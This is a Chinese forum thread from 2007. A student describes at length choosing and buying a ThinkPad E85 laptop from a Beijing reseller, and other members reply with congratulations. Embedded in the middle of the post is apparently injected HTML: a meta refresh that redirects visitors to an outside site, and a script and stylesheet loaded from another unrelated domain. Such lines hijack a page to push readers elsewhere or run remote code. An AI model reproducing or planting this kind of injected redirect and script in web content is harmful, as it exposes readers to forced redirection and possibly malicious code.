开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[原创]我的购机三部曲【欢迎拍砖】

序 源于偶然
      购买到小黑并不是我最初的想法,如果按照我当初的打算来说,笔记本也不在计划之内。因为没有足够的资金。呵呵,见笑了,作为一个学生没有固定的收入。计划是读研之后升级一下自己的台式机,换个大的硬盘,将来做个小型的web服务器(这也有点拮据,呵呵,不过没有办法)。但是计划总赶不上变化,研究生页不用考,保送了(赞一下自己,呵呵),而且还有个特等奖学金(14000那,再赞一下自己),有了钱自然一切都好办。好了,事出偶然,但是买本子就这样定下来了。。

初篇 众里寻她
      既然定下来要买,马上就开始选机器了。说实在的,小黑并不是首选,贵啊,我总不能把钱全都花在这上面。友人建议买华硕,但是据说华硕已经开始走下坡路了。不做考虑。我们宿舍已经有一台华硕的本子了,但是2.8kg的机器真不是一般人拎的。按照自己的想法,初期锁定了hp,hp的质量大家应该也知道,没的说,这几年迎头赶上,在商务机上面感觉仅次于IBM(如果联想再不努力,出早要被hp超过去)。合计一下价钱,感觉6330也确实不错,而且价钱也算可以,才8000+。有一次去电脑市场逛,买完东西后说去hp看看吧,第一感觉人很多,第二感觉机器很好。招来服务员,说打算看看6330,一听我说6330,服务员眼睛都亮了,说你要是看好这机器,那就不用看别的了,这机器是目前卖的最好的机器,货根本跟不上,一直处于脱销状态,哈尔滨整个教化大楼(哈尔滨比较大的电子产品市场)都没有这机器了,要是打算要,可以预订。心想要是这么说的话那肯定选它没错了哈。有了点底,心里着实非常舒服。但是人的欲望总是不会满足的,大家页都有这点感受吧。从hp专卖出来,途径thinkpad体验中心,千不该万不该我走了进去,高兴嘛,自然想多转转。刚一进去,桌上的小黑就吸引了我的眼睛(说实在的这不是第一次了,只是因为太贵所以没有考虑),成熟稳重的外表,让人忍不住多望一眼;大小匀称的体型,真是加一分则多,减一分则少啊;加上手感一流的全尺寸键盘,光滑细腻的触摸板,高分辨率的显示屏幕,独具匠心的键盘灯,不禁心向往之。解说员再一说机器的性能,就拥有它的愿望就更加强烈。防泼溅的键盘,硬盘防护系统,丰富的无线解决方案,安全可靠的性能,谁不想拥有!!看到这里本来兴奋的心情顿时变得沮丧,心想如果得不到它我会忧郁而死的!!(呵呵,玩笑话,但是这种心情大家是会理解的)。无聊之际上网闲逛吧,随手打了T60几个字在百度里面,搜索结果那肯定是一大堆啊。又随便点进去翻看,看配置,看报价,我靠!让我吃了已经,怎么这么便宜!!再仔细一看,是水货。水货?什么东西,不会是假的吧,继续看水货的概念,之后的一些我就不多说了,反正水货ibm和hp价钱差不太多,但是感觉上要比hp优越许多。呵呵,ibm——我的目标,决定了。

下一步,找卖家。在紫丁香BBS里面有个叫老曲的,专门在哈尔滨销售水货的,有网站,信誉很好,但是价钱不低。再说我家在涿州(不知道有多少人知道,在北京西南50公里处,刘备,张飞,郦道元等的故乡),将来工作肯定也要在北京,既然迟早要回去,那自然事找北京的卖家方便了。最初在网上发现的是动态、51社区、双伞,还有一个网站叫什么不记得了,这里面动态算是不错的,网站做的可以,价钱也可以。但是都说了,人总是不满足的,总想找更好的(那句话说没有最好只有更好说的真是太对了)。细节不说了,反正找到了翔意,要我说都是缘分啊,纯粹偶然发现的。比较来比较去发现翔意确实是这里面更好的选择。首先价格合理,赠品方案丰富,选择性强,论坛风气好(老大的治水很有效果),积分换购和拍卖制度很吸引人。还有论坛会员庞大,当然也可以看出购机的用户肯定是多啦!!

一切定局,将来的打算XY购小黑。呵呵,真是众里寻她千百度,得来全不费工夫啊,哦,错了,应该事踏破铁鞋无觅处,那人却在灯火阑珊处!!

中篇 一波三折
      衡量来衡量去,E86比较适合我,首先高分屏,我看着比较习惯,写过程序的都知道,许多时候免去折行的麻烦了,价钱也比较适合我。虽然游戏不常玩,但是比起DQ3来要均衡一些,毕竟是高分屏,有个好点的显卡要比好点的CPU要值一点。于是一边攒积分一边等降价,这期间老大的治水方案让我积分上涨的速度降低了很多,不过也好,分难挣却更加值钱了,呵呵。打算五一出手的(五一的方案很诱人啊)。不过一到五一E86就断货(直到现在也没货吧。估计以后页不会有了),真是可惜。正在这个时候,好像五一刚结束,一个老兄在二手区发了个帖子,说是出售E79,估计有些人看到了,配置很诱人啊,再说保修也有(老大说只要是XY出售的机器不管在谁手里都保修的,赞一个)。联系的很快,价钱也很快就谈好,10500,这个价钱很实惠了。第二天晚上同学去验机,我网上打款,只可以我没有U盾(工行网上转账要电子口令卡或者U盾,我只有电子口令卡,所以每天转账最多5000),只能改为第二天上午我打款,他发货。一切都很顺利,但是顺利的背后可能就意味着失败,呵呵。晚上9点多钟,那老兄打来电话说机器他朋友要了,我和他谈了半天页没有结果。(说实在的,那老兄还不错,不过有时候对一个陌生人讲信用还不如送朋友一个人情,虽然这么说有点违背我做人的原则)。定下心来继续重返论坛吧。继续去寻找价钱、配置与预算之间的平衡点。最终决定E85,就它了。

一波三折之后终于风平浪静。

末篇 该出手时就出手
      发贴的日子也是等降价的日子,T61马上要出了,60是要让路的,再有五一购机的用户很多,势必造成节后购机势头减弱不少,为了维持一定的销售量,机器价格比起五一来肯定是要降价的。果不其然,许多论坛机器都降价了。当然即将到60销售的后期了,降价的次数和幅度也都会相应减少,我也只等XY最后一次降价了(呵呵,如果买60的话,现在购机确实是一个不错的时候,一是价钱基本稳定了,而是可以早用)。果不其然,18号再次降价,于是打定主意,不等了。下手购机!中期答辩(正好赶上本科毕业设计中期答辩)之后回来就准备拍卖那个300优惠了,1500多积分那肯定是没有问题了啊。不过对那个一同参加拍卖的天津朋友真是有点不好意思,有点夺人索爱的感觉。不过我也确实不能等了,我的题目涉及到研究所的一个项目,不久就要出差,如果再等,等出差回来都差不多6月底了,估计到时候能不能买到E85都难说了。该出手时就出手嘛!拍300优惠,联系XY(一直是XY的姐姐和我联系,服务态度很好的说,赞一个),打款,邮购一气呵成。19号一天之内全部完成,一切都很顺利。就等机器了。

最后一句送给即将购机的朋友,看好了就出手吧,现在购机是一个不错的时候。同时选择XY绝对没有错。

后记 最爽的感觉尽在Thinkpad
      22号机器终于到了,迫不及待,开箱就开始使用了。没的说,一个字——爽。细腻的显示,顺手的键盘,舒服的触摸屏,丰富的快捷键,让人眼前一亮的键盘灯,这些仅仅还都是表面,但是这足以让人为之神往。我想凡是打算购买IBM的朋友也一定深知它的有点,所以我就不多说了。谈一下缺点吧:

1、电源有点松动,不是很紧,好像这个问题许多人都遇到过,不过不影响使用。
2、隐藏分区里的系统不稳定,目前遇到的问题有蓝牙和无线异常关闭、ppt异常退出、金山词霸无反应等,建议自己装一个纯净系统,然后添加必要的驱动。
3、不要买那个oem的小鼠标,很容易坏,我仅用了一天就废了(不过还好,刚刚把它修好了,里面有地方短路了),建议直接买蓝快质保的那个。
最后的最后,说一下我的购机方案
机器:E85
拍300优惠、不要快修,选择A套餐(感觉现在内存便宜,等一等还会降的,将来自己给它直接上2G了)

具体如下:
整机一台
隐藏分区恢复盘
XY系统还原光盘
oem包(打算买个双肩威戈的,所以没要原厂包)
清洁套装
oem小鼠标
原装鼠标垫
吸尘器
700XB换屏幕保护膜
500XB换内胆包
XY额外赠送国标电源线一根
EMS邮寄到哈尔滨。。。

PS1:文采不好,看着跟流水帐似的,大家不要介意,就这个水平了。
PS2:这几天一直有事,购机日记迟到了,呵呵。
PS3:再次批评一下oem小鼠标(都不想再说了,那东西页不值钱啊)。
PS4:有兴趣交流的朋友站内PM我。

剩下的见图片吧。。

+800---EddieFan

评分

EddieFan + 800

摄影技术不好,大家见笑了。。

<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

LZ, 赞一个!非常务实的述说!
终于是发完了,老大过来加分吧。
费了我好大劲那,多加分啊。。
嘿嘿!好像是睡上铺的朋友。
原帖由 accountant 于 2007-5-24 22:51 发表
嘿嘿!好像是睡上铺的朋友。

这都让你看出来了。。
恭喜啊,一前一后出手的新货,呵呵
够详细,不错.第2张照的好啊,激发了我出手的欲望,不过现在计划变动,还要等等.
小黑的LOGO都换成新的了??
看上去还不错
顶一下``
恭喜楼主了.
不错啊,呵呵
那天拍300优惠的时候,我一直都在,呵呵
恭喜楼主..

老大怎么没加分啊?
怀念大学那蓝色的格子床单~
赞一下楼主亚。
好大的字体亚,真为你我这样的高分屏着想,看着清楚,赞一个;为什么楼主没换ibm标,再赞一个。
模仿的像吗?楼主>
恭喜LZ了,兄弟还在苦等61呢
最好一张图真有意思~~
吼吼
原帖由 awq 于 2007-5-25 17:14 发表
最好一张图真有意思~~
吼吼

发现了啊,呵呵..
贴了膜可以充当镜面屏了。。
我出手的D53,IBM字样都在的
楼主的IBM标志已经是THINKPAD的啦?
原帖由 andyzz 于 2007-5-26 10:22 发表
楼主的IBM标志已经是THINKPAD的啦?

现在机器基本上都换了吧。。
呵呵 还能说什么呢 恭喜恭喜!!
刚注册 第一次 发贴 看到楼主的幸福结果啊  就是logo怎么是thinkpad 还是带IBM觉得舒服
老大过来把分加上啊。。
怎么没加分啊?

奇怪!!!
原帖由 jk654321 于 2007-5-27 14:22 发表
怎么没加分啊?

奇怪!!!

我也奇怪那。。也不知道是怎么回事啊。。。
呵呵,真的是很羡慕的说,我也很想买小黑啊!